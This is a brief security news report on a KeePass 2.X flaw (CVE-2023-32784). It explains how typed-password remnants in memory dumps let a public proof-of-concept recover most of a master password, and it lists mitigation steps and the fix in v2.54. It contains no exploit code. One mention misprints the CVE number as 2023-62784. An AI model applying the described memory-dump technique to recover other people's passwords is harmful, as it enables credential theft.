A proof-of-concept (PoC) has been made available for a security flaw in the KeePass password manager that could be used to recover a victim’s master password in cleartext in certain situations.
The KeePass 2.X branch for Windows, Linux, and macOS is vulnerable to CVE-2023-32784.
CVE-2023-62784 exists in “SecureTextBoxEx,” a custom text box in KeePass software where the master password and other passwords are entered during editing.
“Apart from the first password character, it is mostly able to recover the password in plaintext,” security researcher “vdohney,” who discovered the flaw and devised a PoC, said. “No code execution on the target system is required, just a memory dump.”
“For example, when ‘Password’ is typed, it will result in these leftover strings: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d. The POC application searches the dump for these patterns and offers a likely password character for each position in the password.” (That is, for every position except the first – a small hiccup for potential attackers.)
KeePass 2.X Master Password Dumper, the proof-of-concept exploit for CVE-2023-32784, is accessible on GitHub. However, using the exploit alone is insufficient to remotely extract the password.
- Change the master password
- Delete hibernation file
- Delete pagefile/swapfile
- To prevent carving, overwrite deleted data on the HDD
- Restart your computer
The vulnerability affects the KeePass 2.X branch for Windows, and possibly for Linux and macOS. It has been fixed in the test versions of KeePass v2.54 – the official release is expected by July 2023.